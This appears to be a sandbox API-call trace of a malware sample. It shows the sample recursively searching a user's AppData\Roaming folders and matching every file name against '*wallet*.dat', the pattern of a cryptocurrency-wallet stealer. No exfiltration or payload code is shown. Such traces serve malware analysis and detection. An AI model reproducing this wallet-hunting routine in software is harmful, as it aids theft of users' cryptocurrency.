PathMatchSpecA (pszFile="ekNsAJS.mp3", pszSpec="*wallet*.dat") returned 0 [0234.668] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ekNsAJS.mp3\\*") returned 51 [0234.668] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ekNsAJS.mp3\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0xb1932c90, ftCreationTime.dwLowDateTime=0x1d81ea1, ftCreationTime.dwHighDateTime=0x44f631a0, ftLastAccessTime.dwLowDateTime=0x1d8230a, ftLastAccessTime.dwHighDateTime=0x44f631a0, ftLastWriteTime.dwLowDateTime=0x1d8230a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1757c, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x6b0065, cFileName="N", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.668] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2747950, ftCreationTime.dwHighDateTime=0x1d81cfc, ftLastAccessTime.dwLowDateTime=0xa3c260a0, ftLastAccessTime.dwHighDateTime=0x1d823b4, ftLastWriteTime.dwLowDateTime=0xa3c260a0, ftLastWriteTime.dwHighDateTime=0x1d823b4, nFileSizeHigh=0x0, nFileSizeLow=0x39ea, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="GN7GDzn8T.mp3", cAlternateFileName="GN7GDZ~1.MP3")) returned 1 [0234.668] StrCmpCA (pszStr1="GN7GDzn8T.mp3", pszStr2=".") returned 25 [0234.668] StrCmpCA (pszStr1="GN7GDzn8T.mp3", pszStr2="..") returned 25 [0234.669] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GN7GDzn8T.mp3") returned 51 [0234.669] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.669] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="GN7GDzn8T.mp3") returned 13 [0234.669] PathMatchSpecA (pszFile="GN7GDzn8T.mp3", pszSpec="*wallet*.dat") returned 0 [0234.669] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GN7GDzn8T.mp3\\*") returned 53 [0234.669] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GN7GDzn8T.mp3\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0xe2747950, ftCreationTime.dwLowDateTime=0x1d81cfc, ftCreationTime.dwHighDateTime=0xa3c260a0, ftLastAccessTime.dwLowDateTime=0x1d823b4, ftLastAccessTime.dwHighDateTime=0xa3c260a0, ftLastWriteTime.dwLowDateTime=0x1d823b4, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x39ea, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x4e0047, cFileName="7", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.669] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d07e5a0, ftCreationTime.dwHighDateTime=0x1d8222b, ftLastAccessTime.dwLowDateTime=0xb8eae1e0, ftLastAccessTime.dwHighDateTime=0x1d828f1, ftLastWriteTime.dwLowDateTime=0xb8eae1e0, ftLastWriteTime.dwHighDateTime=0x1d828f1, nFileSizeHigh=0x0, nFileSizeLow=0x136ad, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="HBLvMvn0KqweD.xlsx", cAlternateFileName="HBLVMV~1.XLS")) returned 1 [0234.669] StrCmpCA (pszStr1="HBLvMvn0KqweD.xlsx", pszStr2=".") returned 26 [0234.669] StrCmpCA (pszStr1="HBLvMvn0KqweD.xlsx", pszStr2="..") returned 26 [0234.669] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HBLvMvn0KqweD.xlsx") returned 56 [0234.669] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.669] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="HBLvMvn0KqweD.xlsx") returned 18 [0234.669] PathMatchSpecA (pszFile="HBLvMvn0KqweD.xlsx", pszSpec="*wallet*.dat") returned 0 [0234.669] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HBLvMvn0KqweD.xlsx\\*") returned 58 [0234.669] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HBLvMvn0KqweD.xlsx\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x2d07e5a0, ftCreationTime.dwLowDateTime=0x1d8222b, ftCreationTime.dwHighDateTime=0xb8eae1e0, ftLastAccessTime.dwLowDateTime=0x1d828f1, ftLastAccessTime.dwHighDateTime=0xb8eae1e0, ftLastWriteTime.dwLowDateTime=0x1d828f1, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x136ad, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x420048, cFileName="L", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.669] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71163500, ftCreationTime.dwHighDateTime=0x1d82774, ftLastAccessTime.dwLowDateTime=0x887ac210, ftLastAccessTime.dwHighDateTime=0x1d82918, ftLastWriteTime.dwLowDateTime=0x887ac210, ftLastWriteTime.dwHighDateTime=0x1d82918, nFileSizeHigh=0x0, nFileSizeLow=0x1768b, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="hDRp_gZiovf7fckAQa.mp4", cAlternateFileName="HDRP_G~1.MP4")) returned 1 [0234.670] StrCmpCA (pszStr1="hDRp_gZiovf7fckAQa.mp4", pszStr2=".") returned 58 [0234.670] StrCmpCA (pszStr1="hDRp_gZiovf7fckAQa.mp4", pszStr2="..") returned 58 [0234.670] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hDRp_gZiovf7fckAQa.mp4") returned 60 [0234.670] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.670] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="hDRp_gZiovf7fckAQa.mp4") returned 22 [0234.670] PathMatchSpecA (pszFile="hDRp_gZiovf7fckAQa.mp4", pszSpec="*wallet*.dat") returned 0 [0234.670] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hDRp_gZiovf7fckAQa.mp4\\*") returned 62 [0234.670] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\hDRp_gZiovf7fckAQa.mp4\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x71163500, ftCreationTime.dwLowDateTime=0x1d82774, ftCreationTime.dwHighDateTime=0x887ac210, ftLastAccessTime.dwLowDateTime=0x1d82918, ftLastAccessTime.dwHighDateTime=0x887ac210, ftLastWriteTime.dwLowDateTime=0x1d82918, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1768b, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x440068, cFileName="R", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.670] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x193530f0, ftCreationTime.dwHighDateTime=0x1d81d5d, ftLastAccessTime.dwLowDateTime=0x2f729340, ftLastAccessTime.dwHighDateTime=0x1d8230b, ftLastWriteTime.dwLowDateTime=0x2f729340, ftLastWriteTime.dwHighDateTime=0x1d8230b, nFileSizeHigh=0x0, nFileSizeLow=0x5e3f, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="IBwW25IlRUYNR.m4a", cAlternateFileName="IBWW25~1.M4A")) returned 1 [0234.670] StrCmpCA (pszStr1="IBwW25IlRUYNR.m4a", pszStr2=".") returned 27 [0234.670] StrCmpCA (pszStr1="IBwW25IlRUYNR.m4a", pszStr2="..") returned 27 [0234.670] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IBwW25IlRUYNR.m4a") returned 55 [0234.670] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.670] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="IBwW25IlRUYNR.m4a") returned 17 [0234.670] PathMatchSpecA (pszFile="IBwW25IlRUYNR.m4a", pszSpec="*wallet*.dat") returned 0 [0234.670] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IBwW25IlRUYNR.m4a\\*") returned 57 [0234.670] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IBwW25IlRUYNR.m4a\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x193530f0, ftCreationTime.dwLowDateTime=0x1d81d5d, ftCreationTime.dwHighDateTime=0x2f729340, ftLastAccessTime.dwLowDateTime=0x1d8230b, ftLastAccessTime.dwHighDateTime=0x2f729340, ftLastWriteTime.dwLowDateTime=0x1d8230b, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x5e3f, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x420049, cFileName="w", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.671] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9a28190, ftCreationTime.dwHighDateTime=0x1d82a1b, ftLastAccessTime.dwLowDateTime=0x590e8960, ftLastAccessTime.dwHighDateTime=0x1d82a1e, ftLastWriteTime.dwLowDateTime=0x590e8960, ftLastWriteTime.dwHighDateTime=0x1d82a1e, nFileSizeHigh=0x0, nFileSizeLow=0xf704, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="JIqRZWYQGp.mp3", cAlternateFileName="JIQRZW~1.MP3")) returned 1 [0234.671] StrCmpCA (pszStr1="JIqRZWYQGp.mp3", pszStr2=".") returned 28 [0234.671] StrCmpCA (pszStr1="JIqRZWYQGp.mp3", pszStr2="..") returned 28 [0234.671] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JIqRZWYQGp.mp3") returned 52 [0234.671] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.671] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="JIqRZWYQGp.mp3") returned 14 [0234.671] PathMatchSpecA (pszFile="JIqRZWYQGp.mp3", pszSpec="*wallet*.dat") returned 0 [0234.671] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JIqRZWYQGp.mp3\\*") returned 54 [0234.671] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\JIqRZWYQGp.mp3\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0xf9a28190, ftCreationTime.dwLowDateTime=0x1d82a1b, ftCreationTime.dwHighDateTime=0x590e8960, ftLastAccessTime.dwLowDateTime=0x1d82a1e, ftLastAccessTime.dwHighDateTime=0x590e8960, ftLastWriteTime.dwLowDateTime=0x1d82a1e, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xf704, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x49004a, cFileName="q", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.671] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901c82b0, ftCreationTime.dwHighDateTime=0x1d82454, ftLastAccessTime.dwLowDateTime=0x767483b0, ftLastAccessTime.dwHighDateTime=0x1d82631, ftLastWriteTime.dwLowDateTime=0x767483b0, ftLastWriteTime.dwHighDateTime=0x1d82631, nFileSizeHigh=0x0, nFileSizeLow=0x2b4e, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="jlR9.ppt", cAlternateFileName="")) returned 1 [0234.671] StrCmpCA (pszStr1="jlR9.ppt", pszStr2=".") returned 60 [0234.671] StrCmpCA (pszStr1="jlR9.ppt", pszStr2="..") returned 60 [0234.671] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jlR9.ppt") returned 46 [0234.671] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.671] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="jlR9.ppt") returned 8 [0234.673] PathMatchSpecA (pszFile="jlR9.ppt", pszSpec="*wallet*.dat") returned 0 [0234.673] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jlR9.ppt\\*") returned 48 [0234.673] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jlR9.ppt\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x901c82b0, ftCreationTime.dwLowDateTime=0x1d82454, ftCreationTime.dwHighDateTime=0x767483b0, ftLastAccessTime.dwLowDateTime=0x1d82631, ftLastAccessTime.dwHighDateTime=0x767483b0, ftLastWriteTime.dwLowDateTime=0x1d82631, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2b4e, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x6c006a, cFileName="R", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.674] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0234.674] StrCmpCA (pszStr1="Microsoft", pszStr2=".") returned 31 [0234.674] StrCmpCA (pszStr1="Microsoft", pszStr2="..") returned 31 [0234.674] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft") returned 47 [0234.674] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.674] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="Microsoft") returned 9 [0234.674] PathMatchSpecA (pszFile="Microsoft", pszSpec="*wallet*.dat") returned 0 [0234.674] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*") returned 49 [0234.674] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName=".", cAlternateFileName="")) returned 0x6e1660 [0234.674] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.674] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName="..", cAlternateFileName="")) returned 1 [0234.674] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.674] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.675] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName="AddIns", cAlternateFileName="")) returned 1 [0234.677] StrCmpCA (pszStr1="AddIns", pszStr2=".") returned 19 [0234.678] StrCmpCA (pszStr1="AddIns", pszStr2="..") returned 19 [0234.678] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns") returned 54 [0234.678] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.678] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\AddIns") returned 16 [0234.678] PathMatchSpecA (pszFile="AddIns", pszSpec="*wallet*.dat") returned 0 [0234.678] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned 56 [0234.678] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1b20 [0234.678] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.678] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.678] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.678] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.679] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 0 [0234.679] FindClose (in: hFindFile=0x6e1b20 | out: hFindFile=0x6e1b20) returned 1 [0234.679] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2000002, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0234.679] StrCmpCA (pszStr1="Bibliography", pszStr2=".") returned 20 [0234.679] StrCmpCA (pszStr1="Bibliography", pszStr2="..") returned 20 [0234.679] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography") returned 60 [0234.679] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.679] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography") returned 22 [0234.679] PathMatchSpecA (pszFile="Bibliography", pszSpec="*wallet*.dat") returned 0 [0234.679] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned 62 [0234.679] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1820 [0234.680] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.680] FindNextFileA (in: hFindFile=0x6e1820, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.680] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.680] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.680] FindNextFileA (in: hFindFile=0x6e1820, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName="Style", cAlternateFileName="")) returned 1 [0234.680] StrCmpCA (pszStr1="Style", pszStr2=".") returned 37 [0234.680] StrCmpCA (pszStr1="Style", pszStr2="..") returned 37 [0234.680] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 66 [0234.680] StrCmpCA (pszStr1="Microsoft\\Bibliography", pszStr2="") returned 77 [0234.680] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style") returned 28 [0234.680] PathMatchSpecA (pszFile="Style", pszSpec="*wallet*.dat") returned 0 [0234.681] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned 68 [0234.681] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1be0 [0234.685] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.685] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.686] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.686] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.686] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0234.686] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2=".") returned 19 [0234.686] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2="..") returned 19 [0234.686] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0234.686] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.686] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 60 [0234.686] PathMatchSpecA (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0234.686] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*") returned 100 [0234.686] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80e9e60e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80e9e60e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a58ff51, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x51722, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x500041, cFileName="A", cAlternateFileName="C")) returned 0xffffffff 